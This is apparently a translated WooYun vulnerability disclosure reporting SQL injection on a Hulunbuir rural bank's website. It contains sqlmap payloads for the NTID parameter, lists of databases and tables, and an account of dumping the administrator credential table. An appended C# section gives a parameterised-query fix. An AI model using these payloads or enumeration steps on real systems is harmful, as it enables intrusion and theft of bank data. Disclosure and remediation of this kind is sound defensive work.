Vulnerability summary

Defect ID: wooyun-2015-0144624

Title: SQL injection on the main site of a bank in Inner Mongolia (DBA privileges & a large number of tables across 23 databases)

Related vendor: hlbrcb.com

Author: 暴走

Submitted: 2015-10-03 12:24

Fixed: 2015-11-26 08:28

Disclosed: 2015-11-26 08:28

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-10-03: Details sent to the vendor; awaiting the vendor's handling
2015-10-12: Vendor confirmed; details disclosed to the vendor only
2015-10-22: Details disclosed to core white hats and experts in the relevant field
2015-11-01: Details disclosed to regular white hats
2015-11-11: Details disclosed to intern white hats
2015-11-26: Details disclosed to the public

Brief description:

Finished dinner, had nothing to do, so went bug hunting...

Detailed description:

The main site of Inner Mongolia Hulunbuir Rural Commercial Bank has a GET-type SQL injection that leaks a large amount of database information.

Proof of vulnerability:

The main site of Inner Mongolia Hulunbuir Rural Commercial Bank has an injection point through which 23 databases and several hundred tables can be read.
SQL injection URL: http://**.**.**.**/TextNewsList.aspx?NTID=11 (injectable parameter: NTID)
Database: SQL Server 2008

sqlmap identified the following injection points with a total of 41 HTTP(s) requests:
---
Place: GET
Parameter: NTID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: NTID=11 AND 9320=9320
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: NTID=11 AND 5690=CONVERT(INT,(SELECT CHAR(113)+CHAR(111)+CHAR(110)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (5690=5690) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(108)+CHAR(111)+CHAR(113)))
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: NTID=-4137 OR 6051=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
Type: inline query
Title: Microsoft SQL Server/Sybase inline queries
Payload: NTID=(SELECT CHAR(113)+CHAR(111)+CHAR(110)+CHAR(100)+CHAR(113)+(SELECT (CASE WHEN (8187=8187) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(119)+CHAR(108)+CHAR(111)+CHAR(113))
---
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008


23 databases in total

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
available databases [23]:
[*] a1
[*] a2
[*] ERP
[*] ERPOA
[*] examDB
[*] ICCO
[*] KQ123
[*] lctj
[*] master
[*] model
[*] msdb
[*] MySchool
[*] MZMT
[*] NS_Web_DB
[*] ReportServer
[*] ReportServerTempDB
[*] sbgl
[*] sbgl1
[*] tempdb
[*] VCDB
[*] XHDCRM
[*] ybj0470
[*] zptest


Current database: NS_Web_DB

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
current database: 'NS_Web_DB'


This database contains 21 tables

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: NS_Web_DB
[21 tables]
+---------------+
| ApplyCompany |
| ApplyPOS |
| ApplyPersonal |
| ApplyWithdraw |
| Article |
| ArticleClass |
| Branch |
| CenterM_Roles |
| CenterM_Users |
| Class |
| Messageboard |
| Messages |
| NewsCategory |
| PicNews |
| S_Tree |
| Survey |
| SurveyOption |
| SysLog |
| TextNews |
| UserRoles |
| Users |
+---------------+


Administrator table: CenterM_Users

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: NS_Web_DB
Table: CenterM_Users
[6 columns]
+----------+---------+
| Column | Type |
+----------+---------+
| Count | int |
| ID | varchar |
| Name | varchar |
| PassWord | varchar |
| RID | int |
| Status | int |
+----------+---------+


Dumped the administrator table to take a look; the administrator passwords are all weak passwords.

[Screenshot: 20.png]


Database a1 contains 129 tables

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: a1
[129 tables]
+-----------------------+
| AtdDayResult |
| AtdFixShiftD |
| AtdFixShiftM |
| AtdHoliday |
| AtdMonthResult |
| AtdProcRec |
| AtdRecLeave |
| AtdRecOver |
| AtdRecRest |
| AtdRecShift |
| AtdRecord |
| AtdResultSect |
| AtdResultType |
| AtdRule |
| AtdRuleList |
| AtdShift |
| AtdShiftGroup |
| AtdShiftSect |
| AtdWeekend |
| CardBalanceInfo |
| CardGrade |
| ChgAmountRecord |
| ChgConsumeSect |
| ChgRecord |
| ConsumeLog |
| CopyChgRecord |
| CopyMngAccount |
| CopyMngCardAdjust |
| CopyMngCardChange |
| CopyMngChgType |
| CopyMngEquPos |
| CopyMngMoneyChange |
| CopyMngRepair |
| CopyParam |
| CpyCopierList |
| CpyMngChgType |
| CustomProperty |
| DeviceParameter |
| DrRecord |
| DrTime |
| DrTimeList |
| EmplCustomProp |
| EquBell |
| EquBellList |
| EquCard |
| EquFinger |
| EquList |
| EquMsg |
| EquMsgText |
| EquReg |
| ErrorChgRecord |
| FPDrTime |
| FPTimeArea |
| FPTimeSect |
| FPTimeTeam |
| FixConsume |
| FixConsumeSet |
| FunParam |
| HrDept |
| HrEmployee |
| HrLeaveEmpl |
| HrTeam |
| JSDrTime |
| JSHolidayDate |
| JiTimeConsume |
| LogSize |
| MngAccount |
| MngBlackList |
| MngCardAdjust |
| MngCardChange |
| MngCardType |
| MngChgType |
| MngEquPos |
| MngMoneyChange |
| MngOrgan |
| MngRecAllowance |
| MngRepair |
| MngSquare |
| PropGroup |
| RegCardInfo |
| ShiftCurDay |
| ShiftNxtDay |
| ShiftPreDay |
| SysAllModule |
| SysBinInfo |
| SysDefDbGb |
| SysDicSubType |
| SysDicType |
| SysFavorite |
| SysFormsLang |
| SysGrid |
| SysGroupMember |
| SysGroupRight |
| SysGuide |
| SysInfo |
| SysIniIDCardNo |
| SysLog |
| SysMenuGroup |
| SysOper |
| SysOperGroup |
| SysPackage |
| SysQryConditionD |
| SysQryConditionM |
| SysRep |
| SysTmpNum |
| SysTxtSet |
| SysUseModule |
| TemplateD |
| TemplateM |
| Tmp150729150105500005 |
| Tmp150729152527373009 |
| TmpConsume |
| TmpOnDuty |
| TmpRealTime |
| TmpRecord |
| WageBankPaper |
| WageCalcMode |
| WageCalcResult |
| WageEmpItemChange |
| WageFixItemChange |
| WageFunction |
| WageItem |
| WagePersonTax |
| WagePersonnel |
| WageWorkProc |
| WageWorkProcMode |
| WorkProcAdjust |
| WorkProcRec |
| consumedetailview |
+-----------------------+


ERPOA contains 100 tables:

web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: ERPOA
[100 tables]
+--------------------+
| ERPAnPai |
| ERPBBSBanKuai |
| ERPBBSTieZi |
| ERPBaoJia |
| ERPBaoXiao |
| ERPBook |
| ERPBookJieHuan |
| ERPBuMen |
| ERPBuyChanPin |
| ERPBuyOrder |
| ERPCYDIC |
| ERPCarInfo |
| ERPCarShiYong |
| ERPCarWeiHu |
| ERPContract |
| ERPContractChanPin |
| ERPCrmSetting |
| ERPCustomFuWu |
| ERPCustomHuiFang |
| ERPCustomInfo |
| ERPCustomNeed |
| ERPDanWeiInfo |
| ERPDangAn |
| ERPDengJi |
| ERPFeiYong |
| ERPFileList |
| ERPFlowType |
| ERPForm |
| ERPFormType |
| ERPGongGao |
| ERPGuDing |
| ERPGuDingJiLu |
| ERPHuiBao |
| ERPJSDIC |
| ERPJiangCheng |
| ERPJiaoSe |
| ERPJinDu |
| ERPJuanKu |
| ERPKaoHe |
| ERPKaoHeRW |
| ERPKaoHeXM |
| ERPKaoQin |
| ERPKaoQinSetting |
| ERPKuaiDi |
| ERPLanEmail |
| ERPLiRun |
| ERPLinkLog |
| ERPLinkMan |
| ERPMeeting |
| ERPMenu |
| ERPMoBan |
| ERPMobile |
| ERPNetEmail |
| ERPOfficething |
| ERPPeiXun |
| ERPPeiXunRiJi |
| ERPPeiXunXiaoGuo |
| ERPPinShen |
| ERPProduct |
| ERPProductType |
| ERPProject |
| ERPRedHead |
| ERPRenShiHeTong |
| ERPRiChangBaoXiao |
| ERPRiZhi |
| ERPSaveFileName |
| ERPSerils |
| ERPShenPi |
| ERPShiShi |
| ERPShouKuan |
| ERPSongHuoDan |
| ERPSongYang |
| ERPSource |
| ERPSupplyLink |
| ERPSupplys |
| ERPSystemSetting |
| ERPTalkInfo |
| ERPTalkOnlineUser |
| ERPTalkSetting |
| ERPTelFile |
| ERPTongXunLu |
| ERPTouSu |
| ERPUser |
| ERPUserDesk |
| ERPVote |
| ERPWorkFlow |
| ERPWorkFlowJieDian |
| ERPWorkPlan |
| ERPWorkRiZhi |
| ERPWorkToDo |
| ERPWuLiuQingKuang |
| ERPYinZhang |
| ERPYinZhangLog |
| ERPZhiShiType |
| ERPZhiSiKu |
| S_GroupMenu |
| S_Role |
| S_RoleMenu |
| S_Times |
| dtproperties |
+--------------------+


Any of them can be read at will!

Fix recommendation:

Bank systems need to take security more seriously.

Copyright notice: when reposting, please credit the source 暴走@乌云
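The flaw the report describes is a query-string value concatenated into the SQL text, and the fix the recommendation leaves unstated is to bind it as a typed parameter. The following is an added C# illustration, not code from the affected site or from this report: it shows the vulnerable pattern beside the hardened one for an ASP.NET Web Forms code-behind. The page name TextNewsList.aspx, the parameter NTID and the table name TextNews come from the report; the connection-string name NS_Web_DB, the columns Title and PubDate, and the GridView NewsGrid are assumptions.

```csharp
// Added illustration, not the affected site's code. Assumes an ASP.NET Web Forms
// code-behind for TextNewsList.aspx, a Web.config connection string named
// "NS_Web_DB", a TextNews table with Title/PubDate columns (assumed names) and a
// GridView control named NewsGrid (assumed).
using System;
using System.Configuration;
using System.Data;
using System.Data.SqlClient;
using System.Web.UI;

public partial class TextNewsList : Page
{
    private static readonly string ConnStr =
        ConfigurationManager.ConnectionStrings["NS_Web_DB"].ConnectionString;

    // VULNERABLE pattern: the raw query-string value becomes part of the SQL text.
    // With NTID=11 AND 9320=9320 (the boolean-based payload sqlmap reported) the
    // appended condition is executed by SQL Server as part of the WHERE clause.
    private DataTable LoadNewsUnsafe(string ntid)
    {
        string sql = "SELECT Title, PubDate FROM TextNews WHERE NTID = " + ntid;
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        using (var da = new SqlDataAdapter(cmd))
        {
            var dt = new DataTable();
            da.Fill(dt);
            return dt;
        }
    }

    // HARDENED pattern: the SQL text is a constant and NTID is sent as a typed
    // parameter, so it can only ever be compared as an integer. None of the four
    // techniques in the sqlmap output (boolean, error, time-based, inline) has
    // anything to inject into.
    private DataTable LoadNewsSafe(int ntid)
    {
        const string sql = "SELECT Title, PubDate FROM TextNews WHERE NTID = @NTID";
        using (var conn = new SqlConnection(ConnStr))
        using (var cmd = new SqlCommand(sql, conn))
        using (var da = new SqlDataAdapter(cmd))
        {
            cmd.Parameters.Add("@NTID", SqlDbType.Int).Value = ntid;
            var dt = new DataTable();
            da.Fill(dt);
            return dt;
        }
    }

    protected void Page_Load(object sender, EventArgs e)
    {
        // NTID is a numeric category id: reject anything that is not a positive
        // integer at the boundary, before any database call is made.
        int ntid;
        if (!int.TryParse(Request.QueryString["NTID"], out ntid) || ntid <= 0)
        {
            Response.StatusCode = 400;
            Context.ApplicationInstance.CompleteRequest();
            return;
        }
        NewsGrid.DataSource = LoadNewsSafe(ntid);
        NewsGrid.DataBind();
    }
}
```

Two further points the report's evidence supports. The error-based technique relies on the CONVERT(INT, ...) failure text being reflected to the client, so production sites should set customErrors to On in Web.config so that SQL Server error messages never reach the response. And binding the parameter removes this injection but does not shrink what a future bug could reach: the site's login was able to enumerate 23 databases, including master and msdb, so it evidently held server-level rights; a login mapped only to NS_Web_DB with SELECT on the news tables would have confined a comparable flaw to that single database.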


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 10

Confirmed: 2015-10-12 08:26

Vendor reply:

CNVD confirmed the described situation and has forwarded it via CNCERT to the Inner Mongolia branch center, which will coordinate with the website's operating unit for subsequent handling.

Latest status:

None yet